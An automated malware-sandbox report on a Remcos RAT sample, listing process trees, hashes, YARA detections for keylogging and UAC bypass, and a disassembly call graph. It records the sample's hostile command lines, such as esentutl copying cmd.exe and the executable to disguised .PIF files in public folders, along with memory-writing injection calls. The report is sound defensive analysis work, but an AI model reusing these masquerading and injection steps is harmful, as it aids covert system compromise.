                                                                      Data Ascii: YeQ0i17dQxaCfXvI4Pzqk/K9LvxhuoYGclWFoLKuoiUh13GTgrDxSdInaDZR/gDjIQ2CdLIb/HTg+KomocqZAGEmwkAyccwMQqcIaCeyM2p96+f8AnKcERJYaJuhhin9Hq0CBj75iKZt779+AYUpyEJWK5nSrUQFcl6qSHJInbJurTthnryqz88qZNRSgG33D7tn8K89PL6fs/H9zdxpvfOuLM7Ps48WIp0Mel3SiNwCZvhxbwsyUyHjZI3fClZ


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:02:12:08
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\jlPBMMQbXC.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "
                                                                      Imagebase:0xc50000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                      Imagebase:0x460000
                                                                      File size:352'768 bytes
                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:02:12:26
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o
                                                                      Imagebase:0x460000
                                                                      File size:352'768 bytes
                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:02:12:26
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                      Imagebase:0xa0000
                                                                      File size:226'712 bytes
                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:02:12:27
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:02:12:37
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\Public\Libraries\Selebzih.PIF
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\Public\Libraries\Selebzih.PIF"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 63%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:02:12:39
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                      Imagebase:0xa0000
                                                                      File size:226'712 bytes
                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:02:12:46
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\Public\Libraries\Selebzih.PIF
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\Public\Libraries\Selebzih.PIF"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:02:12:47
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                                      Imagebase:0x730000
                                                                      File size:86'528 bytes
                                                                      MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:18.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:35%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:21
                                                                        execution_graph 32380 2c77074 33201 2c54860 32380->33201 33202 2c54871 33201->33202 33203 2c54897 33202->33203 33204 2c548ae 33202->33204 33210 2c54bcc 33203->33210 33219 2c545a0 33204->33219 33207 2c548a4 33208 2c548df 33207->33208 33224 2c54530 33207->33224 33211 2c54bd9 33210->33211 33218 2c54c09 33210->33218 33213 2c54c02 33211->33213 33215 2c54be5 33211->33215 33216 2c545a0 11 API calls 33213->33216 33214 2c54bf3 33214->33207 33230 2c52c44 11 API calls 33215->33230 33216->33218 33231 2c544dc 33218->33231 33220 2c545a4 33219->33220 33221 2c545c8 33219->33221 33236 2c52c10 11 API calls 33220->33236 33221->33207 33223 2c545b1 33223->33207 33225 2c54534 33224->33225 33228 2c54544 33224->33228 33227 2c545a0 11 API calls 33225->33227 33225->33228 33226 2c54572 33226->33208 33227->33228 33228->33226 33237 2c52c2c 11 API calls 33228->33237 33230->33214 33232 2c544e2 33231->33232 33233 2c544fd 33231->33233 33232->33233 33235 2c52c2c 11 API calls 33232->33235 33233->33214 33235->33233 33236->33223 33237->33226 33238 2c73e12 33239 2c54860 11 API calls 33238->33239 33240 2c73e33 33239->33240 33241 2c73e4b 33240->33241 34784 2c547ec 33241->34784 33243 2c73e6a 33244 2c73e82 33243->33244 34799 2c689d0 33244->34799 33249 2c54860 11 API calls 33250 2c73ee0 33249->33250 33251 2c73eeb 33250->33251 33252 2c73ef7 33251->33252 33253 2c54860 11 API calls 33252->33253 33254 2c73f18 33253->33254 33255 2c73f23 33254->33255 33256 2c73f30 33255->33256 33257 2c547ec 11 API calls 33256->33257 33258 2c73f4f 33257->33258 33259 2c73f67 33258->33259 33260 2c689d0 20 API calls 33259->33260 33261 2c73f73 33260->33261 33262 2c54860 11 API calls 33261->33262 33263 2c73f94 33262->33263 33264 2c73f9f 33263->33264 33265 2c73fac 33264->33265 33266 2c547ec 11 API calls 33265->33266 33267 2c73fcb 33266->33267 33268 2c73fe3 33267->33268 33269 2c689d0 20 API calls 33268->33269 33270 2c73fef 33269->33270 33271 2c54860 11 API calls 33270->33271 33272 2c74010 33271->33272 33273 2c7401b 33272->33273 33274 2c74028 33273->33274 33275 2c547ec 11 API calls 33274->33275 33276 2c74047 33275->33276 33277 2c74052 33276->33277 33278 2c7405f 33277->33278 33279 2c689d0 20 API calls 33278->33279 33280 2c7406b 33279->33280 34819 2c6e358 33280->34819 33283 2c74091 33284 2c740a2 33283->33284 34824 2c6dc8c 33284->34824 33287 2c54860 11 API calls 33288 2c740f1 33287->33288 33289 2c740fc 33288->33289 33290 2c547ec 11 API calls 33289->33290 33291 2c74128 33290->33291 33292 2c74133 33291->33292 33293 2c689d0 20 API calls 33292->33293 33294 2c7414c 33293->33294 33295 2c54860 11 API calls 33294->33295 33296 2c7416d 33295->33296 33297 2c547ec 11 API calls 33296->33297 33298 2c741a4 33297->33298 33299 2c741af 33298->33299 33300 2c689d0 20 API calls 33299->33300 33301 2c741c8 33300->33301 34839 2c688b8 LoadLibraryW 33301->34839 33303 2c741cd 33304 2c741d7 33303->33304 34844 2c6e678 33304->34844 33307 2c54860 11 API calls 33308 2c74217 33307->33308 33309 2c7422f 33308->33309 33310 2c547ec 11 API calls 33309->33310 33311 2c7424e 33310->33311 33312 2c74259 33311->33312 33313 2c689d0 20 API calls 33312->33313 33314 2c74272 Sleep 33313->33314 33315 2c54860 11 API calls 33314->33315 33316 2c7429d 33315->33316 33317 2c742b5 33316->33317 33318 2c547ec 11 API calls 33317->33318 33319 2c742d4 33318->33319 33320 2c742df 33319->33320 34983 2c546d4 33320->34983 34785 2c54851 34784->34785 34786 2c547f0 34784->34786 34787 2c54530 34786->34787 34788 2c547f8 34786->34788 34793 2c545a0 11 API calls 34787->34793 34794 2c54544 34787->34794 34788->34785 34790 2c54807 34788->34790 34792 2c54530 11 API calls 34788->34792 34789 2c54572 34789->33243 34791 2c545a0 11 API calls 34790->34791 34796 2c54821 34791->34796 34792->34790 34793->34794 34794->34789 34985 2c52c2c 11 API calls 34794->34985 34797 2c54530 11 API calls 34796->34797 34798 2c5484d 34797->34798 34798->33243 34800 2c689e4 34799->34800 34986 2c681cc 34800->34986 34802 2c68a1d 34997 2c68274 34802->34997 34804 2c68a36 35008 2c67d78 34804->35008 34806 2c68a95 35022 2c68338 34806->35022 34809 2c68abc 35034 2c54500 34809->35034 34812 2c6f094 34816 2c6f0b9 34812->34816 34813 2c6f0e5 34815 2c544dc 11 API calls 34813->34815 34817 2c6f0fa 34815->34817 34816->34813 35046 2c546c4 11 API calls 34816->35046 35047 2c54530 11 API calls 34816->35047 34817->33249 34820 2c54bcc 11 API calls 34819->34820 34821 2c6e370 34820->34821 34822 2c6e391 34821->34822 35048 2c549f8 34821->35048 34822->33283 34825 2c6dca2 34824->34825 35055 2c54f20 34825->35055 34827 2c6dcaa 34828 2c6dcca RtlDosPathNameToNtPathName_U 34827->34828 35059 2c6dbdc 34828->35059 34830 2c6dce6 NtCreateFile 34831 2c6dd11 34830->34831 34832 2c549f8 11 API calls 34831->34832 34833 2c6dd23 NtWriteFile NtClose 34832->34833 34834 2c6dd4d 34833->34834 35060 2c54c60 34834->35060 34837 2c544dc 11 API calls 34838 2c6dd5d Sleep 34837->34838 34838->33287 34840 2c68274 15 API calls 34839->34840 34841 2c688f1 34840->34841 34842 2c67d78 18 API calls 34841->34842 34843 2c6891f FreeLibrary 34842->34843 34843->33303 34845 2c6e681 34844->34845 34845->34845 34846 2c54860 11 API calls 34845->34846 34847 2c6e6ca 34846->34847 34848 2c547ec 11 API calls 34847->34848 34849 2c6e6ef 34848->34849 34850 2c689d0 20 API calls 34849->34850 34851 2c6e70a 34850->34851 34852 2c54860 11 API calls 34851->34852 34853 2c6e723 34852->34853 34854 2c547ec 11 API calls 34853->34854 34855 2c6e748 34854->34855 34856 2c689d0 20 API calls 34855->34856 34857 2c6e763 34856->34857 34858 2c54860 11 API calls 34857->34858 34859 2c6e77c 34858->34859 34860 2c547ec 11 API calls 34859->34860 34861 2c6e7a1 34860->34861 34862 2c689d0 20 API calls 34861->34862 34863 2c6e7bc 34862->34863 34864 2c54860 11 API calls 34863->34864 34865 2c6e7ee 34864->34865 34866 2c689d0 20 API calls 34865->34866 34867 2c6e838 34866->34867 34868 2c54860 11 API calls 34867->34868 34869 2c6e86f 34868->34869 34870 2c547ec 11 API calls 34869->34870 34871 2c6e894 34870->34871 34872 2c689d0 20 API calls 34871->34872 34873 2c6e8af 34872->34873 34874 2c54860 11 API calls 34873->34874 34875 2c6e8c8 34874->34875 34876 2c547ec 11 API calls 34875->34876 34877 2c6e8ed 34876->34877 34878 2c689d0 20 API calls 34877->34878 34879 2c6e908 34878->34879 34880 2c54860 11 API calls 34879->34880 34881 2c6e921 34880->34881 34882 2c547ec 11 API calls 34881->34882 34883 2c6e946 34882->34883 34884 2c689d0 20 API calls 34883->34884 34885 2c6e961 34884->34885 35063 2c57f2c 34885->35063 34887 2c6e985 35067 2c68788 34887->35067 34890 2c54860 11 API calls 34891 2c6ea0a 34890->34891 34892 2c547ec 11 API calls 34891->34892 34893 2c6ea3b 34892->34893 34894 2c689d0 20 API calls 34893->34894 34895 2c6ea5f 34894->34895 34896 2c54860 11 API calls 34895->34896 34897 2c6ea7b 34896->34897 34898 2c547ec 11 API calls 34897->34898 34899 2c6eaac 34898->34899 34900 2c689d0 20 API calls 34899->34900 34901 2c6ead0 34900->34901 34902 2c54860 11 API calls 34901->34902 34903 2c6eaec 34902->34903 34904 2c547ec 11 API calls 34903->34904 34905 2c6eb1d 34904->34905 34906 2c689d0 20 API calls 34905->34906 34907 2c6eb41 34906->34907 34908 2c54860 11 API calls 34907->34908 34909 2c6eb5d 34908->34909 34910 2c547ec 11 API calls 34909->34910 34911 2c6eb7b 34910->34911 35079 2c6894c LoadLibraryW 34911->35079 34914 2c54860 11 API calls 34915 2c6ebac 34914->34915 34916 2c547ec 11 API calls 34915->34916 34917 2c6ebca 34916->34917 34918 2c6894c 21 API calls 34917->34918 34919 2c6ebdf 34918->34919 34920 2c54860 11 API calls 34919->34920 34921 2c6ebfb 34920->34921 34922 2c547ec 11 API calls 34921->34922 34923 2c6ec19 34922->34923 34924 2c6894c 21 API calls 34923->34924 34925 2c6ec2e 34924->34925 34926 2c54860 11 API calls 34925->34926 34927 2c6ec4a 34926->34927 34928 2c547ec 11 API calls 34927->34928 34929 2c6ec68 34928->34929 34930 2c6894c 21 API calls 34929->34930 34931 2c6ec7d 34930->34931 34932 2c6ec87 34931->34932 34933 2c6eee2 34931->34933 34934 2c54860 11 API calls 34932->34934 34935 2c54500 11 API calls 34933->34935 34938 2c6eca3 34934->34938 34936 2c6eeff 34935->34936 34937 2c54c60 SysFreeString 34936->34937 34939 2c6ef0a 34937->34939 34941 2c547ec 11 API calls 34938->34941 34940 2c54500 11 API calls 34939->34940 34942 2c6ef1a 34940->34942 34947 2c6ecd4 34941->34947 34943 2c54c60 SysFreeString 34942->34943 34944 2c6ef22 34943->34944 34945 2c54500 11 API calls 34944->34945 34946 2c6ef2f 34945->34946 34946->33307 34948 2c689d0 20 API calls 34947->34948 34949 2c6ecf8 34948->34949 34950 2c54860 11 API calls 34949->34950 34951 2c6ed14 34950->34951 34952 2c547ec 11 API calls 34951->34952 34953 2c6ed45 34952->34953 34954 2c689d0 20 API calls 34953->34954 34955 2c6ed69 WaitForSingleObject CloseHandle CloseHandle 34954->34955 34956 2c54860 11 API calls 34955->34956 34957 2c6eda0 34956->34957 34958 2c547ec 11 API calls 34957->34958 34959 2c6edbe 34958->34959 34960 2c6894c 21 API calls 34959->34960 34961 2c6edd3 34960->34961 34962 2c54860 11 API calls 34961->34962 34963 2c6edef 34962->34963 34964 2c547ec 11 API calls 34963->34964 34965 2c6ee0d 34964->34965 34966 2c6894c 21 API calls 34965->34966 34967 2c6ee22 34966->34967 34968 2c54860 11 API calls 34967->34968 34969 2c6ee3e 34968->34969 34970 2c547ec 11 API calls 34969->34970 34971 2c6ee5c 34970->34971 34972 2c6894c 21 API calls 34971->34972 34973 2c6ee71 34972->34973 34974 2c54860 11 API calls 34973->34974 34975 2c6ee8d 34974->34975 34976 2c547ec 11 API calls 34975->34976 34977 2c6eeab 34976->34977 34978 2c6894c 21 API calls 34977->34978 34979 2c6eec0 34978->34979 34980 2c6894c 21 API calls 34979->34980 34981 2c6eed1 34980->34981 34982 2c6894c 21 API calls 34981->34982 34982->34933 34984 2c546da 34983->34984 34985->34789 34987 2c54530 11 API calls 34986->34987 34988 2c681ef 34987->34988 35038 2c6798c 34988->35038 34990 2c681fc 34991 2c68204 GetModuleHandleA 34990->34991 34992 2c68274 15 API calls 34991->34992 34993 2c68215 GetModuleHandleA 34992->34993 34994 2c68233 34993->34994 34995 2c544dc 11 API calls 34994->34995 34996 2c6823b 34995->34996 34996->34802 34998 2c54530 11 API calls 34997->34998 34999 2c68299 34998->34999 35000 2c6798c 12 API calls 34999->35000 35001 2c682a6 35000->35001 35002 2c547ec 11 API calls 35001->35002 35003 2c682b3 35002->35003 35004 2c682bb GetModuleHandleW GetProcAddress GetProcAddress 35003->35004 35005 2c682ee 35004->35005 35006 2c54500 11 API calls 35005->35006 35007 2c682fb 35006->35007 35007->34804 35009 2c54530 11 API calls 35008->35009 35010 2c67d9d 35009->35010 35011 2c6798c 12 API calls 35010->35011 35012 2c67daa 35011->35012 35013 2c547ec 11 API calls 35012->35013 35014 2c67dba 35013->35014 35015 2c681cc 17 API calls 35014->35015 35016 2c67dcd 35015->35016 35017 2c68274 15 API calls 35016->35017 35018 2c67dd3 NtWriteVirtualMemory 35017->35018 35019 2c67dff 35018->35019 35020 2c54500 11 API calls 35019->35020 35021 2c67e0c 35020->35021 35021->34806 35023 2c54530 11 API calls 35022->35023 35024 2c6835b 35023->35024 35025 2c54860 11 API calls 35024->35025 35026 2c6837a 35025->35026 35027 2c681cc 17 API calls 35026->35027 35028 2c6838d 35027->35028 35029 2c68274 15 API calls 35028->35029 35030 2c68393 FlushInstructionCache 35029->35030 35031 2c683b9 35030->35031 35032 2c544dc 11 API calls 35031->35032 35033 2c683c1 FreeLibrary 35032->35033 35033->34809 35035 2c54506 35034->35035 35036 2c5452c 35035->35036 35045 2c52c2c 11 API calls 35035->35045 35036->34812 35039 2c6799d 35038->35039 35040 2c54bcc 11 API calls 35039->35040 35042 2c679ad 35040->35042 35041 2c67a19 35041->34990 35042->35041 35044 2c5babc CharNextA 35042->35044 35044->35042 35045->35035 35046->34816 35047->34816 35049 2c549ac 35048->35049 35050 2c549e7 35049->35050 35051 2c545a0 11 API calls 35049->35051 35050->34821 35052 2c549c3 35051->35052 35052->35050 35054 2c52c2c 11 API calls 35052->35054 35054->35050 35056 2c54f26 SysAllocStringLen 35055->35056 35057 2c54f3c 35055->35057 35056->35057 35058 2c54c30 35056->35058 35057->34827 35058->35055 35059->34830 35061 2c54c74 35060->35061 35062 2c54c66 SysFreeString 35060->35062 35061->34837 35062->35061 35064 2c57f3f 35063->35064 35086 2c54a00 35064->35086 35068 2c54530 11 API calls 35067->35068 35069 2c687ab 35068->35069 35070 2c54860 11 API calls 35069->35070 35071 2c687ca 35070->35071 35072 2c681cc 17 API calls 35071->35072 35073 2c687dd 35072->35073 35074 2c68274 15 API calls 35073->35074 35075 2c687e3 CreateProcessAsUserW 35074->35075 35076 2c68827 35075->35076 35077 2c544dc 11 API calls 35076->35077 35078 2c6882f 35077->35078 35078->34890 35080 2c68973 GetProcAddress 35079->35080 35081 2c689bb 35079->35081 35082 2c689b0 FreeLibrary 35080->35082 35083 2c6898d 35080->35083 35081->34914 35082->35081 35084 2c67d78 18 API calls 35083->35084 35085 2c689a5 35084->35085 35085->35082 35087 2c54a05 35086->35087 35088 2c54a32 35086->35088 35087->35088 35090 2c54a19 35087->35090 35089 2c544dc 11 API calls 35088->35089 35092 2c54a28 35089->35092 35093 2c545cc 35090->35093 35092->34887 35094 2c545a0 11 API calls 35093->35094 35095 2c545dc 35094->35095 35096 2c544dc 11 API calls 35095->35096 35097 2c545f4 35096->35097 35097->35092 35098 2c7c350 35101 2c6f7c8 35098->35101 35102 2c6f7d0 35101->35102 35102->35102 35103 2c6f7d7 35102->35103 35104 2c688b8 20 API calls 35103->35104 35105 2c6f7f1 35104->35105 37512 2c52ee0 QueryPerformanceCounter 35105->37512 35107 2c6f7f6 35108 2c6f800 InetIsOffline 35107->35108 35109 2c6f80a 35108->35109 35110 2c6f81b 35108->35110 35111 2c54530 11 API calls 35109->35111 35112 2c54530 11 API calls 35110->35112 35113 2c6f819 35111->35113 35112->35113 35114 2c54860 11 API calls 35113->35114 35115 2c6f848 35114->35115 35116 2c6f850 35115->35116 35117 2c6f85a 35116->35117 35118 2c547ec 11 API calls 35117->35118 35119 2c6f873 35118->35119 35120 2c6f87b 35119->35120 35121 2c6f885 35120->35121 35122 2c689d0 20 API calls 35121->35122 35123 2c6f88e 35122->35123 35124 2c54860 11 API calls 35123->35124 35125 2c6f8ac 35124->35125 35126 2c6f8b4 35125->35126 35127 2c546d4 35126->35127 35128 2c6f8be 35127->35128 35129 2c547ec 11 API calls 35128->35129 35130 2c6f8d7 35129->35130 35131 2c6f8df 35130->35131 35132 2c6f8e9 35131->35132 35133 2c689d0 20 API calls 35132->35133 35134 2c6f8f2 35133->35134 35135 2c54860 11 API calls 35134->35135 35136 2c6f910 35135->35136 35137 2c6f918 35136->35137 35138 2c546d4 35137->35138 35139 2c6f922 35138->35139 35140 2c547ec 11 API calls 35139->35140 35141 2c6f93b 35140->35141 35142 2c6f943 35141->35142 35143 2c6f94d 35142->35143 35144 2c689d0 20 API calls 35143->35144 35145 2c6f956 35144->35145 35146 2c54860 11 API calls 35145->35146 35147 2c6f974 35146->35147 35148 2c546d4 35147->35148 35149 2c6f986 35148->35149 35150 2c547ec 11 API calls 35149->35150 35151 2c6f99f 35150->35151 35152 2c6f9b1 35151->35152 35153 2c689d0 20 API calls 35152->35153 35154 2c6f9ba 35153->35154 35155 2c54860 11 API calls 35154->35155 35156 2c6f9d8 35155->35156 35157 2c6f9ea 35156->35157 35158 2c547ec 11 API calls 35157->35158 35159 2c6fa03 35158->35159 35160 2c689d0 20 API calls 35159->35160 35161 2c6fa1e 35160->35161 35162 2c54860 11 API calls 35161->35162 35163 2c6fa3c 35162->35163 35164 2c6fa4e 35163->35164 35165 2c547ec 11 API calls 35164->35165 35166 2c6fa67 35165->35166 35167 2c6fa79 35166->35167 35168 2c689d0 20 API calls 35167->35168 35169 2c6fa82 35168->35169 35170 2c54860 11 API calls 35169->35170 35171 2c6faa0 35170->35171 35172 2c6faa8 35171->35172 35173 2c6fab2 35172->35173 35174 2c547ec 11 API calls 35173->35174 35175 2c6facb 35174->35175 35176 2c6fad3 35175->35176 35177 2c546d4 35176->35177 35178 2c6fadd 35177->35178 35179 2c689d0 20 API calls 35178->35179 35180 2c6fae6 35179->35180 37515 2c6f6e8 GetModuleHandleW 35180->37515 35182 2c6faeb 35183 2c6faf3 35182->35183 35184 2c7b2ff 35182->35184 37519 2c6f744 GetModuleHandleW 35183->37519 35187 2c6fb00 35188 2c6fb1e 35187->35188 35189 2c689d0 20 API calls 35188->35189 35190 2c6fb27 35189->35190 35191 2c6fb45 35190->35191 35192 2c689d0 20 API calls 35191->35192 35193 2c6fb4e 35192->35193 35194 2c546d4 